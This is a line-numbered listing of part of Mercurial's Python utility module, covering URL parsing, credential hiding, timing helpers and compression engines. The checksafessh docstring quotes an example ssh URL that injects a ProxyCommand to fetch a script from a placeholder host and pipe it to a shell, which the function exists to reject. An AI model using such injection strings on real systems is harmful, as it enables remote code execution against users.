2614 2615 if parsefragment and '#' in path:
2615 2616 path, self.fragment = path.split('#', 1)
2616 2617
2617 2618 # special case for Windows drive letters and UNC paths
2618 2619 if hasdriveletter(path) or path.startswith('\\\\'):
2619 2620 self.path = path
2620 2621 return
2621 2622
2622 2623 # For compatibility reasons, we can't handle bundle paths as
2623 2624 # normal URLS
2624 2625 if path.startswith('bundle:'):
2625 2626 self.scheme = 'bundle'
2626 2627 path = path[7:]
2627 2628 if path.startswith('//'):
2628 2629 path = path[2:]
2629 2630 self.path = path
2630 2631 return
2631 2632
2632 2633 if self._matchscheme(path):
2633 2634 parts = path.split(':', 1)
2634 2635 if parts[0]:
2635 2636 self.scheme, path = parts
2636 2637 self._localpath = False
2637 2638
2638 2639 if not path:
2639 2640 path = None
2640 2641 if self._localpath:
2641 2642 self.path = ''
2642 2643 return
2643 2644 else:
2644 2645 if self._localpath:
2645 2646 self.path = path
2646 2647 return
2647 2648
2648 2649 if parsequery and '?' in path:
2649 2650 path, self.query = path.split('?', 1)
2650 2651 if not path:
2651 2652 path = None
2652 2653 if not self.query:
2653 2654 self.query = None
2654 2655
2655 2656 # // is required to specify a host/authority
2656 2657 if path and path.startswith('//'):
2657 2658 parts = path[2:].split('/', 1)
2658 2659 if len(parts) > 1:
2659 2660 self.host, path = parts
2660 2661 else:
2661 2662 self.host = parts[0]
2662 2663 path = None
2663 2664 if not self.host:
2664 2665 self.host = None
2665 2666 # path of file:///d is /d
2666 2667 # path of file:///d:/ is d:/, not /d:/
2667 2668 if path and not hasdriveletter(path):
2668 2669 path = '/' + path
2669 2670
2670 2671 if self.host and '@' in self.host:
2671 2672 self.user, self.host = self.host.rsplit('@', 1)
2672 2673 if ':' in self.user:
2673 2674 self.user, self.passwd = self.user.split(':', 1)
2674 2675 if not self.host:
2675 2676 self.host = None
2676 2677
2677 2678 # Don't split on colons in IPv6 addresses without ports
2678 2679 if (self.host and ':' in self.host and
2679 2680 not (self.host.startswith('[') and self.host.endswith(']'))):
2680 2681 self._hostport = self.host
2681 2682 self.host, self.port = self.host.rsplit(':', 1)
2682 2683 if not self.host:
2683 2684 self.host = None
2684 2685
2685 2686 if (self.host and self.scheme == 'file' and
2686 2687 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2687 2688 raise error.Abort(_('file:// URLs can only refer to localhost'))
2688 2689
2689 2690 self.path = path
2690 2691
2691 2692 # leave the query string escaped
2692 2693 for a in ('user', 'passwd', 'host', 'port',
2693 2694 'path', 'fragment'):
2694 2695 v = getattr(self, a)
2695 2696 if v is not None:
2696 2697 setattr(self, a, urlreq.unquote(v))
2697 2698
2698 2699 @encoding.strmethod
2699 2700 def __repr__(self):
2700 2701 attrs = []
2701 2702 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2702 2703 'query', 'fragment'):
2703 2704 v = getattr(self, a)
2704 2705 if v is not None:
2705 2706 attrs.append('%s: %r' % (a, v))
2706 2707 return '<url %s>' % ', '.join(attrs)
2707 2708
2708 2709 def __bytes__(self):
2709 2710 r"""Join the URL's components back into a URL string.
2710 2711
2711 2712 Examples:
2712 2713
2713 2714 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2714 2715 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2715 2716 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2716 2717 'http://user:pw@host:80/?foo=bar&baz=42'
2717 2718 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2718 2719 'http://user:pw@host:80/?foo=bar%3dbaz'
2719 2720 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2720 2721 'ssh://user:pw@[::1]:2200//home/joe#'
2721 2722 >>> bytes(url(b'http://localhost:80//'))
2722 2723 'http://localhost:80//'
2723 2724 >>> bytes(url(b'http://localhost:80/'))
2724 2725 'http://localhost:80/'
2725 2726 >>> bytes(url(b'http://localhost:80'))
2726 2727 'http://localhost:80/'
2727 2728 >>> bytes(url(b'bundle:foo'))
2728 2729 'bundle:foo'
2729 2730 >>> bytes(url(b'bundle://../foo'))
2730 2731 'bundle:../foo'
2731 2732 >>> bytes(url(b'path'))
2732 2733 'path'
2733 2734 >>> bytes(url(b'file:///tmp/foo/bar'))
2734 2735 'file:///tmp/foo/bar'
2735 2736 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2736 2737 'file:///c:/tmp/foo/bar'
2737 2738 >>> print(url(br'bundle:foo\bar'))
2738 2739 bundle:foo\bar
2739 2740 >>> print(url(br'file:///D:\data\hg'))
2740 2741 file:///D:\data\hg
2741 2742 """
2742 2743 if self._localpath:
2743 2744 s = self.path
2744 2745 if self.scheme == 'bundle':
2745 2746 s = 'bundle:' + s
2746 2747 if self.fragment:
2747 2748 s += '#' + self.fragment
2748 2749 return s
2749 2750
2750 2751 s = self.scheme + ':'
2751 2752 if self.user or self.passwd or self.host:
2752 2753 s += '//'
2753 2754 elif self.scheme and (not self.path or self.path.startswith('/')
2754 2755 or hasdriveletter(self.path)):
2755 2756 s += '//'
2756 2757 if hasdriveletter(self.path):
2757 2758 s += '/'
2758 2759 if self.user:
2759 2760 s += urlreq.quote(self.user, safe=self._safechars)
2760 2761 if self.passwd:
2761 2762 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2762 2763 if self.user or self.passwd:
2763 2764 s += '@'
2764 2765 if self.host:
2765 2766 if not (self.host.startswith('[') and self.host.endswith(']')):
2766 2767 s += urlreq.quote(self.host)
2767 2768 else:
2768 2769 s += self.host
2769 2770 if self.port:
2770 2771 s += ':' + urlreq.quote(self.port)
2771 2772 if self.host:
2772 2773 s += '/'
2773 2774 if self.path:
2774 2775 # TODO: similar to the query string, we should not unescape the
2775 2776 # path when we store it, the path might contain '%2f' = '/',
2776 2777 # which we should *not* escape.
2777 2778 s += urlreq.quote(self.path, safe=self._safepchars)
2778 2779 if self.query:
2779 2780 # we store the query in escaped form.
2780 2781 s += '?' + self.query
2781 2782 if self.fragment is not None:
2782 2783 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2783 2784 return s
2784 2785
2785 2786 __str__ = encoding.strmethod(__bytes__)
2786 2787
2787 2788 def authinfo(self):
2788 2789 user, passwd = self.user, self.passwd
2789 2790 try:
2790 2791 self.user, self.passwd = None, None
2791 2792 s = bytes(self)
2792 2793 finally:
2793 2794 self.user, self.passwd = user, passwd
2794 2795 if not self.user:
2795 2796 return (s, None)
2796 2797 # authinfo[1] is passed to urllib2 password manager, and its
2797 2798 # URIs must not contain credentials. The host is passed in the
2798 2799 # URIs list because Python < 2.4.3 uses only that to search for
2799 2800 # a password.
2800 2801 return (s, (None, (s, self.host),
2801 2802 self.user, self.passwd or ''))
2802 2803
2803 2804 def isabs(self):
2804 2805 if self.scheme and self.scheme != 'file':
2805 2806 return True # remote URL
2806 2807 if hasdriveletter(self.path):
2807 2808 return True # absolute for our purposes - can't be joined()
2808 2809 if self.path.startswith(br'\\'):
2809 2810 return True # Windows UNC path
2810 2811 if self.path.startswith('/'):
2811 2812 return True # POSIX-style
2812 2813 return False
2813 2814
2814 2815 def localpath(self):
2815 2816 if self.scheme == 'file' or self.scheme == 'bundle':
2816 2817 path = self.path or '/'
2817 2818 # For Windows, we need to promote hosts containing drive
2818 2819 # letters to paths with drive letters.
2819 2820 if hasdriveletter(self._hostport):
2820 2821 path = self._hostport + '/' + self.path
2821 2822 elif (self.host is not None and self.path
2822 2823 and not hasdriveletter(path)):
2823 2824 path = '/' + path
2824 2825 return path
2825 2826 return self._origpath
2826 2827
2827 2828 def islocal(self):
2828 2829 '''whether localpath will return something that posixfile can open'''
2829 2830 return (not self.scheme or self.scheme == 'file'
2830 2831 or self.scheme == 'bundle')
2831 2832
2832 2833 def hasscheme(path):
2833 2834 return bool(url(path).scheme)
2834 2835
2835 2836 def hasdriveletter(path):
2836 2837 return path and path[1:2] == ':' and path[0:1].isalpha()
2837 2838
2838 2839 def urllocalpath(path):
2839 2840 return url(path, parsequery=False, parsefragment=False).localpath()
2840 2841
2841 2842 def checksafessh(path):
2842 2843 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2843 2844
2844 2845 This is a sanity check for ssh urls. ssh will parse the first item as
2845 2846 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2846 2847 Let's reject these potentially malicious urls entirely and warn the
2847 2848 user.
2848 2849
2849 2850 Raises an error.Abort when the url is unsafe.
2850 2851 """
2851 2852 path = urlreq.unquote(path)
2852 2853 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2853 2854 raise error.Abort(_('potentially unsafe url: %r') %
2854 2855 (pycompat.bytestr(path),))
2855 2856
2856 2857 def hidepassword(u):
2857 2858 '''hide user credential in a url string'''
2858 2859 u = url(u)
2859 2860 if u.passwd:
2860 2861 u.passwd = '***'
2861 2862 return bytes(u)
2862 2863
2863 2864 def removeauth(u):
2864 2865 '''remove all authentication information from a url string'''
2865 2866 u = url(u)
2866 2867 u.user = u.passwd = None
2867 2868 return bytes(u)
2868 2869
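# For example (credentials hypothetical):
#
#   hidepassword(b'http://alice:secret@example.com/repo')
#   # -> 'http://alice:***@example.com/repo'
#   removeauth(b'http://alice:secret@example.com/repo')
#   # -> 'http://example.com/repo'
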
2869 2870 timecount = unitcountfn(
2870 2871 (1000, 1, _('%.0f s')),
2871 2872 (100, 1, _('%.1f s')),
2872 2873 (10, 1, _('%.2f s')),
2873 2874 (1, 1, _('%.3f s')),
2874 2875 (100, 0.001, _('%.1f ms')),
2875 2876 (10, 0.001, _('%.2f ms')),
2876 2877 (1, 0.001, _('%.3f ms')),
2877 2878 (100, 0.000001, _('%.1f us')),
2878 2879 (10, 0.000001, _('%.2f us')),
2879 2880 (1, 0.000001, _('%.3f us')),
2880 2881 (100, 0.000000001, _('%.1f ns')),
2881 2882 (10, 0.000000001, _('%.2f ns')),
2882 2883 (1, 0.000000001, _('%.3f ns')),
2883 2884 )
2884 2885
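# Same mechanism as bytecount, applied to a duration in seconds:
#
#   timecount(0.004)   # -> '4.000 ms'
#   timecount(0.25)    # -> '250.0 ms'
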
2885 2886 _timenesting = [0]
2886 2887
2887 2888 def timed(func):
2888 2889 '''Report the execution time of a function call to stderr.
2889 2890
2890 2891 During development, use as a decorator when you need to measure
2891 2892 the cost of a function, e.g. as follows:
2892 2893
2893 2894 @util.timed
2894 2895 def foo(a, b, c):
2895 2896 pass
2896 2897 '''
2897 2898
2898 2899 def wrapper(*args, **kwargs):
2899 2900 start = timer()
2900 2901 indent = 2
2901 2902 _timenesting[0] += indent
2902 2903 try:
2903 2904 return func(*args, **kwargs)
2904 2905 finally:
2905 2906 elapsed = timer() - start
2906 2907 _timenesting[0] -= indent
2907 2908 stderr.write('%s%s: %s\n' %
2908 2909 (' ' * _timenesting[0], func.__name__,
2909 2910 timecount(elapsed)))
2910 2911 return wrapper
2911 2912
2912 2913 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2913 2914 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2914 2915
2915 2916 def sizetoint(s):
2916 2917 '''Convert a space specifier to a byte count.
2917 2918
2918 2919 >>> sizetoint(b'30')
2919 2920 30
2920 2921 >>> sizetoint(b'2.2kb')
2921 2922 2252
2922 2923 >>> sizetoint(b'6M')
2923 2924 6291456
2924 2925 '''
2925 2926 t = s.strip().lower()
2926 2927 try:
2927 2928 for k, u in _sizeunits:
2928 2929 if t.endswith(k):
2929 2930 return int(float(t[:-len(k)]) * u)
2930 2931 return int(t)
2931 2932 except ValueError:
2932 2933 raise error.ParseError(_("couldn't parse size: %s") % s)
2933 2934
2934 2935 class hooks(object):
2935 2936 '''A collection of hook functions that can be used to extend a
2936 2937 function's behavior. Hooks are called in lexicographic order,
2937 2938 based on the names of their sources.'''
2938 2939
2939 2940 def __init__(self):
2940 2941 self._hooks = []
2941 2942
2942 2943 def add(self, source, hook):
2943 2944 self._hooks.append((source, hook))
2944 2945
2945 2946 def __call__(self, *args):
2946 2947 self._hooks.sort(key=lambda x: x[0])
2947 2948 results = []
2948 2949 for source, hook in self._hooks:
2949 2950 results.append(hook(*args))
2950 2951 return results
2951 2952
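# Hooks run ordered by source name, not registration order. Sketch:
#
#   h = hooks()
#   h.add(b'zz-late', lambda v: v + 1)
#   h.add(b'aa-early', lambda v: v * 2)
#   h(3)   # -> [6, 4]
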
2952 2953 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2953 2954 '''Yields lines for a nicely formatted stacktrace.
2954 2955 Skips the 'skip' last entries, then returns the last 'depth' entries.
2955 2956 Each file+linenumber is formatted according to fileline.
2956 2957 Each line is formatted according to line.
2957 2958 If line is None, it yields:
2958 2959 length of longest filepath+line number,
2959 2960 filepath+linenumber,
2960 2961 function
2961 2962
2962 2963 Not to be used in production code, but very convenient while developing.
2963 2964 '''
2964 2965 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2965 2966 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2966 2967 ][-depth:]
2967 2968 if entries:
2968 2969 fnmax = max(len(entry[0]) for entry in entries)
2969 2970 for fnln, func in entries:
2970 2971 if line is None:
2971 2972 yield (fnmax, fnln, func)
2972 2973 else:
2973 2974 yield line % (fnmax, fnln, func)
2974 2975
2975 2976 def debugstacktrace(msg='stacktrace', skip=0,
2976 2977 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2977 2978 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2978 2979 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
2979 2980 By default it will flush stdout first.
2980 2981 It can be used everywhere and intentionally does not require an ui object.
2981 2982 Not to be used in production code, but very convenient while developing.
2982 2983 '''
2983 2984 if otherf:
2984 2985 otherf.flush()
2985 2986 f.write('%s at:\n' % msg.rstrip())
2986 2987 for line in getstackframes(skip + 1, depth=depth):
2987 2988 f.write(line)
2988 2989 f.flush()
2989 2990
2990 2991 class dirs(object):
2991 2992 '''a multiset of directory names from a dirstate or manifest'''
2992 2993
2993 2994 def __init__(self, map, skip=None):
2994 2995 self._dirs = {}
2995 2996 addpath = self.addpath
2996 2997 if safehasattr(map, 'iteritems') and skip is not None:
2997 2998 for f, s in map.iteritems():
2998 2999 if s[0] != skip:
2999 3000 addpath(f)
3000 3001 else:
3001 3002 for f in map:
3002 3003 addpath(f)
3003 3004
3004 3005 def addpath(self, path):
3005 3006 dirs = self._dirs
3006 3007 for base in finddirs(path):
3007 3008 if base in dirs:
3008 3009 dirs[base] += 1
3009 3010 return
3010 3011 dirs[base] = 1
3011 3012
3012 3013 def delpath(self, path):
3013 3014 dirs = self._dirs
3014 3015 for base in finddirs(path):
3015 3016 if dirs[base] > 1:
3016 3017 dirs[base] -= 1
3017 3018 return
3018 3019 del dirs[base]
3019 3020
3020 3021 def __iter__(self):
3021 3022 return iter(self._dirs)
3022 3023
3023 3024 def __contains__(self, d):
3024 3025 return d in self._dirs
3025 3026
3026 3027 if safehasattr(parsers, 'dirs'):
3027 3028 dirs = parsers.dirs
3028 3029
3029 3030 def finddirs(path):
3030 3031 pos = path.rfind('/')
3031 3032 while pos != -1:
3032 3033 yield path[:pos]
3033 3034 pos = path.rfind('/', 0, pos)
3034 3035
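# finddirs yields ancestors from deepest to shallowest:
#
#   list(finddirs(b'a/b/c'))   # -> ['a/b', 'a']
#
# which is what lets dirs.addpath() stop at the first ancestor that is
# already counted.
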
3035 3036 # compression code
3036 3037
3037 3038 SERVERROLE = 'server'
3038 3039 CLIENTROLE = 'client'
3039 3040
3040 3041 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3041 3042 (u'name', u'serverpriority',
3042 3043 u'clientpriority'))
3043 3044
3044 3045 class compressormanager(object):
3045 3046 """Holds registrations of various compression engines.
3046 3047
3047 3048 This class essentially abstracts the differences between compression
3048 3049 engines to allow new compression formats to be added easily, possibly from
3049 3050 extensions.
3050 3051
3051 3052 Compressors are registered against the global instance by calling its
3052 3053 ``register()`` method.
3053 3054 """
3054 3055 def __init__(self):
3055 3056 self._engines = {}
3056 3057 # Bundle spec human name to engine name.
3057 3058 self._bundlenames = {}
3058 3059 # Internal bundle identifier to engine name.
3059 3060 self._bundletypes = {}
3060 3061 # Revlog header to engine name.
3061 3062 self._revlogheaders = {}
3062 3063 # Wire proto identifier to engine name.
3063 3064 self._wiretypes = {}
3064 3065
3065 3066 def __getitem__(self, key):
3066 3067 return self._engines[key]
3067 3068
3068 3069 def __contains__(self, key):
3069 3070 return key in self._engines
3070 3071
3071 3072 def __iter__(self):
3072 3073 return iter(self._engines.keys())
3073 3074
3074 3075 def register(self, engine):
3075 3076 """Register a compression engine with the manager.
3076 3077
3077 3078 The argument must be a ``compressionengine`` instance.
3078 3079 """
3079 3080 if not isinstance(engine, compressionengine):
3080 3081 raise ValueError(_('argument must be a compressionengine'))
3081 3082
3082 3083 name = engine.name()
3083 3084
3084 3085 if name in self._engines:
3085 3086 raise error.Abort(_('compression engine %s already registered') %
3086 3087 name)
3087 3088
3088 3089 bundleinfo = engine.bundletype()
3089 3090 if bundleinfo:
3090 3091 bundlename, bundletype = bundleinfo
3091 3092
3092 3093 if bundlename in self._bundlenames:
3093 3094 raise error.Abort(_('bundle name %s already registered') %
3094 3095 bundlename)
3095 3096 if bundletype in self._bundletypes:
3096 3097 raise error.Abort(_('bundle type %s already registered by %s') %
3097 3098 (bundletype, self._bundletypes[bundletype]))
3098 3099
3099 3100 # Only register an external-facing name if one was declared.
3100 3101 if bundlename:
3101 3102 self._bundlenames[bundlename] = name
3102 3103
3103 3104 self._bundletypes[bundletype] = name
3104 3105
3105 3106 wiresupport = engine.wireprotosupport()
3106 3107 if wiresupport:
3107 3108 wiretype = wiresupport.name
3108 3109 if wiretype in self._wiretypes:
3109 3110 raise error.Abort(_('wire protocol compression %s already '
3110 3111 'registered by %s') %
3111 3112 (wiretype, self._wiretypes[wiretype]))
3112 3113
3113 3114 self._wiretypes[wiretype] = name
3114 3115
3115 3116 revlogheader = engine.revlogheader()
3116 3117 if revlogheader and revlogheader in self._revlogheaders:
3117 3118 raise error.Abort(_('revlog header %s already registered by %s') %
3118 3119 (revlogheader, self._revlogheaders[revlogheader]))
3119 3120
3120 3121 if revlogheader:
3121 3122 self._revlogheaders[revlogheader] = name
3122 3123
3123 3124 self._engines[name] = engine
3124 3125
3125 3126 @property
3126 3127 def supportedbundlenames(self):
3127 3128 return set(self._bundlenames.keys())
3128 3129
3129 3130 @property
3130 3131 def supportedbundletypes(self):
3131 3132 return set(self._bundletypes.keys())
3132 3133
3133 3134 def forbundlename(self, bundlename):
3134 3135 """Obtain a compression engine registered to a bundle name.
3135 3136
3136 3137 Will raise KeyError if the bundle type isn't registered.
3137 3138
3138 3139 Will abort if the engine is known but not available.
3139 3140 """
3140 3141 engine = self._engines[self._bundlenames[bundlename]]
3141 3142 if not engine.available():
3142 3143 raise error.Abort(_('compression engine %s could not be loaded') %
3143 3144 engine.name())
3144 3145 return engine
3145 3146
3146 3147 def forbundletype(self, bundletype):
3147 3148 """Obtain a compression engine registered to a bundle type.
3148 3149
3149 3150 Will raise KeyError if the bundle type isn't registered.
3150 3151
3151 3152 Will abort if the engine is known but not available.
3152 3153 """
3153 3154 engine = self._engines[self._bundletypes[bundletype]]
3154 3155 if not engine.available():
3155 3156 raise error.Abort(_('compression engine %s could not be loaded') %
3156 3157 engine.name())
3157 3158 return engine
3158 3159
3159 3160 def supportedwireengines(self, role, onlyavailable=True):
3160 3161 """Obtain compression engines that support the wire protocol.
3161 3162
3162 3163 Returns a list of engines in prioritized order, most desired first.
3163 3164
3164 3165 If ``onlyavailable`` is set, filter out engines that can't be
3165 3166 loaded.
3166 3167 """
3167 3168 assert role in (SERVERROLE, CLIENTROLE)
3168 3169
3169 3170 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3170 3171
3171 3172 engines = [self._engines[e] for e in self._wiretypes.values()]
3172 3173 if onlyavailable:
3173 3174 engines = [e for e in engines if e.available()]
3174 3175
3175 3176 def getkey(e):
3176 3177 # Sort first by priority, highest first. In case of tie, sort
3177 3178 # alphabetically. This is arbitrary, but ensures output is
3178 3179 # stable.
3179 3180 w = e.wireprotosupport()
3180 3181 return -1 * getattr(w, attr), w.name
3181 3182
3182 3183 return sorted(engines, key=getkey)
3183 3184
3184 3185 def forwiretype(self, wiretype):
3185 3186 engine = self._engines[self._wiretypes[wiretype]]
3186 3187 if not engine.available():
3187 3188 raise error.Abort(_('compression engine %s could not be loaded') %
3188 3189 engine.name())
3189 3190 return engine
3190 3191
3191 3192 def forrevlogheader(self, header):
3192 3193 """Obtain a compression engine registered to a revlog header.
3193 3194
3194 3195 Will raise KeyError if the revlog header value isn't registered.
3195 3196 """
3196 3197 return self._engines[self._revlogheaders[header]]
3197 3198
3198 3199 compengines = compressormanager()
3199 3200
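# Lookup sketch, assuming the zlib engine defined below has been
# registered (registration happens at import time, further down the
# module):
#
#   engine = compengines.forbundlename('gzip')
#   engine.name()   # -> 'zlib'
#
# forbundletype('GZ') resolves the same engine via the internal bundle
# identifier rather than the user-facing spec name.
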
3200 3201 class compressionengine(object):
3201 3202 """Base class for compression engines.
3202 3203
3203 3204 Compression engines must implement the interface defined by this class.
3204 3205 """
3205 3206 def name(self):
3206 3207 """Returns the name of the compression engine.
3207 3208
3208 3209 This is the key the engine is registered under.
3209 3210
3210 3211 This method must be implemented.
3211 3212 """
3212 3213 raise NotImplementedError()
3213 3214
3214 3215 def available(self):
3215 3216 """Whether the compression engine is available.
3216 3217
3217 3218 The intent of this method is to allow optional compression engines
3218 3219 that may not be available in all installations (such as engines relying
3219 3220 on C extensions that may not be present).
3220 3221 """
3221 3222 return True
3222 3223
3223 3224 def bundletype(self):
3224 3225 """Describes bundle identifiers for this engine.
3225 3226
3226 3227 If this compression engine isn't supported for bundles, returns None.
3227 3228
3228 3229 If this engine can be used for bundles, returns a 2-tuple of strings of
3229 3230 the user-facing "bundle spec" compression name and an internal
3230 3231 identifier used to denote the compression format within bundles. To
3231 3232 exclude the name from external usage, set the first element to ``None``.
3232 3233
3233 3234 If bundle compression is supported, the class must also implement
3234 3235 ``compressstream`` and ``decompressorreader``.
3235 3236
3236 3237 The docstring of this method is used in the help system to tell users
3237 3238 about this engine.
3238 3239 """
3239 3240 return None
3240 3241
3241 3242 def wireprotosupport(self):
3242 3243 """Declare support for this compression format on the wire protocol.
3243 3244
3244 3245 If this compression engine isn't supported for compressing wire
3245 3246 protocol payloads, returns None.
3246 3247
3247 3248 Otherwise, returns ``compenginewireprotosupport`` with the following
3248 3249 fields:
3249 3250
3250 3251 * String format identifier
3251 3252 * Integer priority for the server
3252 3253 * Integer priority for the client
3253 3254
3254 3255 The integer priorities are used to order the advertisement of format
3255 3256 support by server and client. The highest integer is advertised
3256 3257 first. Integers with non-positive values aren't advertised.
3257 3258
3258 3259 The priority values are somewhat arbitrary and only used for default
3259 3260 ordering. The relative order can be changed via config options.
3260 3261
3261 3262 If wire protocol compression is supported, the class must also implement
3262 3263 ``compressstream`` and ``decompressorreader``.
3263 3264 """
3264 3265 return None
3265 3266
3266 3267 def revlogheader(self):
3267 3268 """Header added to revlog chunks that identifies this engine.
3268 3269
3269 3270 If this engine can be used to compress revlogs, this method should
3270 3271 return the bytes used to identify chunks compressed with this engine.
3271 3272 Else, the method should return ``None`` to indicate it does not
3272 3273 participate in revlog compression.
3273 3274 """
3274 3275 return None
3275 3276
3276 3277 def compressstream(self, it, opts=None):
3277 3278 """Compress an iterator of chunks.
3278 3279
3279 3280 The method receives an iterator (ideally a generator) of chunks of
3280 3281 bytes to be compressed. It returns an iterator (ideally a generator)
3281 3282 of bytes of chunks representing the compressed output.
3282 3283
3283 3284 Optionally accepts an argument defining how to perform compression.
3284 3285 Each engine treats this argument differently.
3285 3286 """
3286 3287 raise NotImplementedError()
3287 3288
3288 3289 def decompressorreader(self, fh):
3289 3290 """Perform decompression on a file object.
3290 3291
3291 3292 Argument is an object with a ``read(size)`` method that returns
3292 3293 compressed data. Return value is an object with a ``read(size)`` that
3293 3294 returns uncompressed data.
3294 3295 """
3295 3296 raise NotImplementedError()
3296 3297
3297 3298 def revlogcompressor(self, opts=None):
3298 3299 """Obtain an object that can be used to compress revlog entries.
3299 3300
3300 3301 The object has a ``compress(data)`` method that compresses binary
3301 3302 data. This method returns compressed binary data or ``None`` if
3302 3303 the data could not be compressed (too small, not compressible, etc.).
3303 3304 The returned data should have a header uniquely identifying this
3304 3305 compression format so decompression can be routed to this engine.
3305 3306 This header should be identified by the ``revlogheader()`` return
3306 3307 value.
3307 3308
3308 3309 The object has a ``decompress(data)`` method that decompresses
3309 3310 data. The method will only be called if ``data`` begins with
3310 3311 ``revlogheader()``. The method should return the raw, uncompressed
3311 3312 data or raise a ``RevlogError``.
3312 3313
3313 3314 The object is reusable but is not thread safe.
3314 3315 """
3315 3316 raise NotImplementedError()
3316 3317
3317 3318 class _zlibengine(compressionengine):
3318 3319 def name(self):
3319 3320 return 'zlib'
3320 3321
3321 3322 def bundletype(self):
3322 3323 """zlib compression using the DEFLATE algorithm.
3323 3324
3324 3325 All Mercurial clients should support this format. The compression
3325 3326 algorithm strikes a reasonable balance between compression ratio
3326 3327 and size.
3327 3328 """
3328 3329 return 'gzip', 'GZ'
3329 3330
3330 3331 def wireprotosupport(self):
3331 3332 return compewireprotosupport('zlib', 20, 20)
3332 3333
3333 3334 def revlogheader(self):
3334 3335 return 'x'
3335 3336
3336 3337 def compressstream(self, it, opts=None):
3337 3338 opts = opts or {}
3338 3339
3339 3340 z = zlib.compressobj(opts.get('level', -1))
3340 3341 for chunk in it:
3341 3342 data = z.compress(chunk)
3342 3343 # Not all calls to compress emit data. It is cheaper to inspect
3343 3344 # here than to feed empty chunks through the generator.
3344 3345 if data:
3345 3346 yield data
3346 3347
3347 3348 yield z.flush()
3348 3349
3349 3350 def decompressorreader(self, fh):
3350 3351 def gen():
3351 3352 d = zlib.decompressobj()
3352 3353 for chunk in filechunkiter(fh):
3353 3354 while chunk:
3354 3355 # Limit output size to limit memory.
3355 3356 yield d.decompress(chunk, 2 ** 18)
3356 3357 chunk = d.unconsumed_tail
3357 3358
3358 3359 return chunkbuffer(gen())
3359 3360
3360 3361 class zlibrevlogcompressor(object):
3361 3362 def compress(self, data):
3362 3363 insize = len(data)
3363 3364 # Caller handles empty input case.
3364 3365 assert insize > 0
3365 3366
3366 3367 if insize < 44:
3367 3368 return None
3368 3369
3369 3370 elif insize <= 1000000:
3370 3371 compressed = zlib.compress(data)
3371 3372 if len(compressed) < insize:
3372 3373 return compressed
3373 3374 return None
3374 3375
3375 3376 # zlib makes an internal copy of the input buffer, doubling
3376 3377 # memory usage for large inputs. So do streaming compression
3377 3378 # on large inputs.
3378 3379 else:
3379 3380 z = zlib.compressobj()
3380 3381 parts = []
3381 3382 pos = 0
3382 3383 while pos < insize:
3383 3384 pos2 = pos + 2**20
3384 3385 parts.append(z.compress(data[pos:pos2]))
3385 3386 pos = pos2
3386 3387 parts.append(z.flush())
3387 3388
3388 3389 if sum(map(len, parts)) < insize:
3389 3390 return ''.join(parts)
3390 3391 return None
3391 3392
3392 3393 def decompress(self, data):
3393 3394 try:
3394 3395 return zlib.decompress(data)
3395 3396 except zlib.error as e:
3396 3397 raise error.RevlogError(_('revlog decompress error: %s') %
3397 3398 stringutil.forcebytestr(e))
3398 3399
3399 3400 def revlogcompressor(self, opts=None):
3400 3401 return self.zlibrevlogcompressor()
3401 3402
3402 3403 compengines.register(_zlibengine())
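# Round-trip sketch for the zlib engine above (comment only; assumes the
# ``compengines`` registry in this module and the ``bytesio`` alias defined
# at the top of the file):
#
#   eng = compengines['zlib']
#   blob = ''.join(eng.compressstream(iter(['hello ', 'world'])))
#   reader = eng.decompressorreader(bytesio(blob))
#   assert reader.read(11) == 'hello world'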
3403 3404
3404 3405 class _bz2engine(compressionengine):
3405 3406 def name(self):
3406 3407 return 'bz2'
3407 3408
3408 3409 def bundletype(self):
3409 3410 """An algorithm that produces smaller bundles than ``gzip``.
3410 3411
3411 3412 All Mercurial clients should support this format.
3412 3413
3413 3414 This engine will likely produce smaller bundles than ``gzip`` but
3414 3415 will be significantly slower, both during compression and
3415 3416 decompression.
3416 3417
3417 3418 If available, the ``zstd`` engine can yield similar or better
3418 3419 compression at much higher speeds.
3419 3420 """
3420 3421 return 'bzip2', 'BZ'
3421 3422
3422 3423 # We declare a protocol name but don't advertise by default because
3423 3424 # it is slow.
3424 3425 def wireprotosupport(self):
3425 3426 return compewireprotosupport('bzip2', 0, 0)
3426 3427
3427 3428 def compressstream(self, it, opts=None):
3428 3429 opts = opts or {}
3429 3430 z = bz2.BZ2Compressor(opts.get('level', 9))
3430 3431 for chunk in it:
3431 3432 data = z.compress(chunk)
3432 3433 if data:
3433 3434 yield data
3434 3435
3435 3436 yield z.flush()
3436 3437
3437 3438 def decompressorreader(self, fh):
3438 3439 def gen():
3439 3440 d = bz2.BZ2Decompressor()
3440 3441 for chunk in filechunkiter(fh):
3441 3442 yield d.decompress(chunk)
3442 3443
3443 3444 return chunkbuffer(gen())
3444 3445
3445 3446 compengines.register(_bz2engine())
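# Usage sketch (comment only): the optional ``opts`` mapping selects the
# bz2 compression level (1-9; this engine defaults to 9), e.g.
#
#   eng = compengines['bz2']
#   out = ''.join(eng.compressstream(iter(['payload']), {'level': 1}))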
3446 3447
3447 3448 class _truncatedbz2engine(compressionengine):
3448 3449 def name(self):
3449 3450 return 'bz2truncated'
3450 3451
3451 3452 def bundletype(self):
3452 3453 return None, '_truncatedBZ'
3453 3454
3454 3455 # We don't implement compressstream because it is hackily handled elsewhere.
3455 3456
